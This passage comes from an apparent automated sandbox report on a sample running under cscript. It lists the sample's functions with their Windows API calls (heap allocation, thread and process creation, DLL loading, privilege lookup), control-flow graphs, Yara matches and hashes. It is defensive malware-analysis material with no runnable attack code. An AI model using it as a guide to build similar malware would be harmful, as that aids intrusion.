                                        • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                        • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025FF9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.669430082.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: true
                                        • Associated: 00000007.00000002.669421162.00000000025E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669517370.00000000026D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669524373.00000000026E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669530863.00000000026E4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669537783.00000000026E7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669544839.00000000026F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669584383.0000000002750000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_25e0000_cscript.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                        • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                        • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                        • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025FFED0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.669430082.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: true
                                        • Associated: 00000007.00000002.669421162.00000000025E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669517370.00000000026D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669524373.00000000026E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669530863.00000000026E4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669537783.00000000026E7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669544839.00000000026F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669584383.0000000002750000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_25e0000_cscript.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                        • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                        • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                        • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025FFFB4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.669430082.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: true
                                        • Associated: 00000007.00000002.669421162.00000000025E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669517370.00000000026D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669524373.00000000026E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669530863.00000000026E4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669537783.00000000026E7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669544839.00000000026F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669584383.0000000002750000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_25e0000_cscript.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                        • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                        • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                        • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025FFC60 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.669430082.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: true
                                        • Associated: 00000007.00000002.669421162.00000000025E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669517370.00000000026D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669524373.00000000026E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669530863.00000000026E4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669537783.00000000026E7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669544839.00000000026F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669584383.0000000002750000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_25e0000_cscript.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                        • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                        • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                        • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025FFDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.669430082.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: true
                                        • Associated: 00000007.00000002.669421162.00000000025E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669517370.00000000026D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669524373.00000000026E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669530863.00000000026E4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669537783.00000000026E7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669544839.00000000026F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669584383.0000000002750000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_25e0000_cscript.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                        • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                        • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                        • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025FFD8C Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.669430082.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: true
                                        • Associated: 00000007.00000002.669421162.00000000025E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669517370.00000000026D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669524373.00000000026E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669530863.00000000026E4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669537783.00000000026E7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669544839.00000000026F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669584383.0000000002750000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_25e0000_cscript.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                        • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                        • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                        • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000888F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 109 888f8-888fb 110 888fd-88917 call 891f0 109->110 111 888ce-888d7 call 891f0 109->111 116 8891c-88931 RtlFreeHeap 110->116 113 888dc-888f1 RtlAllocateHeap 111->113
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00083546,?,00083CBF,00083CBF,?,00083546,?,?,?,?,?,00000000,00000000,?), ref: 000888ED
                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00073B93), ref: 0008892D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, Offset: 00070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70000_cscript.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateFree
                                        • String ID: .z`
                                        • API String ID: 2488874121-1441809116
                                        • Opcode ID: 4c5ba10d9c51f865b194dc3736448fdfe1e5e5ee2b25d6100a1a73cb72516a02
                                        • Instruction ID: b014163cc9b913c0b629b15064b87cda6db459a987ac69b34c2b0c897a2b4afc
                                        • Opcode Fuzzy Hash: 4c5ba10d9c51f865b194dc3736448fdfe1e5e5ee2b25d6100a1a73cb72516a02
                                        • Instruction Fuzzy Hash: C9F069B5204208ABCB14EFA8DC49EEB77A8FF88310F158559FD4957202CA31E915CBB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00087310 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 117 87310-8733f 118 8734b-87352 117->118 119 87346 call 8a030 117->119 120 87358-873a8 call 8a100 call 79b50 call 83e60 118->120 121 8742c-87432 118->121 119->118 128 873b0-873c1 Sleep 120->128 129 873c3-873c9 128->129 130 87426-8742a 128->130 131 873cb-873f1 call 86f40 129->131 132 873f3-87413 129->132 130->121 130->128 134 87419-8741c 131->134 132->134 135 87414 call 87140 132->135 134->130 135->134
                                        APIs
                                        • Sleep.KERNELBASE(000007D0), ref: 000873B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, Offset: 00070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70000_cscript.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep
                                        • String ID: net.dll$wininet.dll
                                        • API String ID: 3472027048-1269752229
                                        • Opcode ID: 19fac6c6d9d19817078639699de6516aba48ff98aa28ccd64e356128316098ac
                                        • Instruction ID: 5badedc9a37de08c3e7630c41ede601a88437ba1e325786e32ce0a3e1dd4f882
                                        • Opcode Fuzzy Hash: 19fac6c6d9d19817078639699de6516aba48ff98aa28ccd64e356128316098ac
                                        • Instruction Fuzzy Hash: 2131AEB6601600ABC711EF64C8A1FABB7B8BF88700F10811DFA5D5B246D730E545CBE1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0008730B Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 137 8730b-87352 call 8a030 140 87358-873a8 call 8a100 call 79b50 call 83e60 137->140 141 8742c-87432 137->141 148 873b0-873c1 Sleep 140->148 149 873c3-873c9 148->149 150 87426-8742a 148->150 151 873cb-873f1 call 86f40 149->151 152 873f3-87413 149->152 150->141 150->148 154 87419-8741c 151->154 152->154 155 87414 call 87140 152->155 154->150 155->154
                                        APIs
                                        • Sleep.KERNELBASE(000007D0), ref: 000873B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, Offset: 00070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70000_cscript.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep
                                        • String ID: net.dll$wininet.dll
                                        • API String ID: 3472027048-1269752229
                                        • Opcode ID: e6868592de10f999360633539865730f6bd523b5653f432c1baa39c15d275289
                                        • Instruction ID: ce1847b0c54a5465bf7ed79bd782f1d8472ae6bf6ed73bec6672554bfbb1fefd
                                        • Opcode Fuzzy Hash: e6868592de10f999360633539865730f6bd523b5653f432c1baa39c15d275289
                                        • Instruction Fuzzy Hash: BB218F71A01204ABD710EF64C8A1FABBBB4FF48700F148129FA5D5B246D774A555CBE1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00088900 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 270 88900-88916 271 8891c-88931 RtlFreeHeap 270->271 272 88917 call 891f0 270->272 272->271
                                        APIs
                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00073B93), ref: 0008892D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, Offset: 00070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70000_cscript.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID: .z`
                                        • API String ID: 3298025750-1441809116
                                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                        • Instruction ID: 6b343e5ca7d362668cd1648677a740e5cda9a9fd9d3802fe19597226ca11f5f1
                                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                        • Instruction Fuzzy Hash: 77E01AB12002086BDB14EF59CC49EA777ACAF88750F014554BD0957242C630E910CAB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00077290 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 273 77290-772da call 8a150 call 8ad30 call 79b50 call 83e60 282 7730e-77312 273->282 283 772dc-772ee PostThreadMessageW 273->283 284 772f0-7730b call 792b0 PostThreadMessageW 283->284 285 7730d 283->285 284->285 285->282
                                        APIs
                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000772EA
                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0007730B
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, Offset: 00070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70000_cscript.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID:
                                        • API String ID: 1836367815-0
                                        • Opcode ID: 994c45faea13cb418c5c737c6ea6ae1566b778804876f6a16b380246b8a5685b
                                        • Instruction ID: 83eb128077dfb17d9b40e7edcbae2c808f9841411210aa046b9be1a092d31486
                                        • Opcode Fuzzy Hash: 994c45faea13cb418c5c737c6ea6ae1566b778804876f6a16b380246b8a5685b
                                        • Instruction Fuzzy Hash: DC01A731E8022876EB21B6949C03FFE776C6B41F51F054115FF08BA1C2E6986A0687F6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0008743C Relevance: 1.6, APIs: 1, Instructions: 115threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 376 8743c-8743f 377 87441-87468 call 83e60 376->377 378 87496 376->378 388 8746a-87486 call 8d5e2 CreateThread 377->388 389 87487-8748c 377->389 380 87498-8749e 378->380 381 874a0-874a6 378->381 380->381 382 874a8-874b1 381->382 383 874c3-874ca 381->383 382->383 385 874b3-874ba 382->385 386 875ad-875b0 383->386 387 874d0-87599 call 8a0d0 * 2 call 8a3a0 call 8a0d0 call 8a3a0 call 8a0d0 * 2 383->387 385->387 390 874bc 385->390 387->386 408 8759b-875a4 387->408 390->383 408->386 409 875a6 408->409 409->386
                                        APIs
                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0007CD00,?,?), ref: 0008747C
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, Offset: 00070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70000_cscript.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateThread
                                        • String ID:
                                        • API String ID: 2422867632-0
                                        • Opcode ID: c4bd161ebea22670f06eda08fffa7a0e7a3b00ce2c504777dde7e80dfc1ac83a
                                        • Instruction ID: 2d1c15623e7cffc3ca01bb40b2913289ae81c5c16a1b732dab10d5850b54bc84
                                        • Opcode Fuzzy Hash: c4bd161ebea22670f06eda08fffa7a0e7a3b00ce2c504777dde7e80dfc1ac83a
                                        • Instruction Fuzzy Hash: A541AD726017056FD725EE74C8A1FE7B3A8BF84300F144619F59E97286DB70B8158BA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0007D437 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 410 7d437-7d43c 411 7d483-7d4d4 call 8a150 call 78a40 call 896a0 call 77130 410->411 412 7d43e-7d464 call 83e60 410->412 425 7d4d6-7d4dc 411->425 426 7d4dd-7d501 call 8a3c0 411->426 417 7d466-7d46b SetErrorMode 412->417 418 7d46d-7d470 412->418 417->418 429 7d502-7d50a 426->429 430 7d511-7d51a call 792b0 429->430 431 7d50c-7d50f 429->431 432 7d51d-7d533 call 8ac50 430->432 431->430 431->432 437 7d556-7d558 432->437 438 7d535-7d553 call 8a3c0 call 8a0d0 432->438 440 7d5c7-7d5d2 437->440 441 7d55a-7d55d 437->441 438->437 443 7d5d3-7d5db 441->443 444 7d55f-7d576 call 83a60 441->444 449 7d5b1-7d5b8 444->449 450 7d578-7d5a3 call 7d2c0 444->450 449->429 452 7d5be-7d5c6 449->452 450->452 454 7d5a5-7d5af call 8a0b0 450->454 454->449
                                        APIs
                                        • SetErrorMode.KERNELBASE(00008003,?,?,00077C93,?), ref: 0007D46B
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, Offset: 00070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70000_cscript.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorMode
                                        • String ID:
                                        • API String ID: 2340568224-0
                                        • Opcode ID: 70d8ccff7463c67245f8cb547c8dc23503766b656f3f1e16caf514be364316b5
                                        • Instruction ID: 92bfe0cd26085cdaf917d84261b996ce8a8344137e6a4c980f62df207faefcec
                                        • Opcode Fuzzy Hash: 70d8ccff7463c67245f8cb547c8dc23503766b656f3f1e16caf514be364316b5
                                        • Instruction Fuzzy Hash: 6E01D871E402087AEF20EA64DC46FFA73B8AF94710F048555F90DD7183E6B4E99187A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00079B50 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 457 79b50-79b79 call 8af80 460 79b7f-79b8d call 8b3a0 457->460 461 79b7b-79b7e 457->461 464 79b8f-79b9a call 8b620 460->464 465 79b9d-79bae call 89730 460->465 464->465 470 79bc7-79bca 465->470 471 79bb0-79bc4 LdrLoadDll 465->471 471->470
                                        APIs
                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00079BC2
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, Offset: 00070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70000_cscript.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Load
                                        • String ID:
                                        • API String ID: 2234796835-0
                                        • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                        • Instruction ID: 2a497a07ad1e6883282b814e8c91441eeb22b12239e84eaad9f865061b68a603
                                        • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                        • Instruction Fuzzy Hash: 4A011EB5E0020DABDB10EAE4ED42FDDB7B8AB54308F0081A5E90897242F675EB14CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00088970 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 472 88970-889c8 call 891f0 CreateProcessInternalW
                                        APIs
                                        • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000889C4
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, Offset: 00070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70000_cscript.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateInternalProcess
                                        • String ID:
                                        • API String ID: 2186235152-0
                                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                        • Instruction ID: f2292a0d6b574bf21c96bcaed42f42d315a8dfe52550726d4df4f2630cd72f02
                                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                        • Instruction Fuzzy Hash: C701AFB2214108ABCB54DF89DC84EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00087440 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 475 87440-8745b 476 87461-87468 475->476 477 8745c call 83e60 475->477 478 8746a-87486 call 8d5e2 CreateThread 476->478 479 87487-8748c 476->479 477->476
                                        APIs
                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0007CD00,?,?), ref: 0008747C
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, Offset: 00070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70000_cscript.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateThread
                                        • String ID:
                                        • API String ID: 2422867632-0
                                        • Opcode ID: 3d896b48f5ae3f61c940dbc0491d4aba50d9e38c85a04b8e2dcf38253628bd18
                                        • Instruction ID: 65881e9ea5978ed5ac5a36b98cd60bb518f522f8a21cb0e0e6bb2ef9d254d8a0
                                        • Opcode Fuzzy Hash: 3d896b48f5ae3f61c940dbc0491d4aba50d9e38c85a04b8e2dcf38253628bd18
                                        • Instruction Fuzzy Hash: DFE06D333802143AE22075999C03FE7B39CDB91B20F240126FA4DEA2C2D595F90143A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000888C0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00083546,?,00083CBF,00083CBF,?,00083546,?,?,?,?,?,00000000,00000000,?), ref: 000888ED
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, Offset: 00070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70000_cscript.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                        • Instruction ID: 8edcb89061e5ca552eb6a6b8a36fdd40fb6d256b8832837c70ae5d29ce1dfe2d
                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                        • Instruction Fuzzy Hash: 2AE012B1200208ABDB14EF99CC85EA777ACBF88750F158558BE095B242CA30F910CBB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00088A60 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                        Download Yara Rule
                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0007CFD2,0007CFD2,?,00000000,?,?), ref: 00088A90
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, Offset: 00070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70000_cscript.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LookupPrivilegeValue
                                        • String ID:
                                        • API String ID: 3899507212-0
                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                        • Instruction ID: d695fb75b69121cf86d1e46562e3162ebb5e1b1726ac457d68d82d94bafad8e3
                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                        • Instruction Fuzzy Hash: FEE01AB12002086BDB10EF49CC85EE737ADAF88750F018154BE0957242C930E8108BF5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0007D440 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNELBASE(00008003,?,?,00077C93,?), ref: 0007D46B
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, Offset: 00070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70000_cscript.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorMode
                                        • String ID:
                                        • API String ID: 2340568224-0
                                        • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
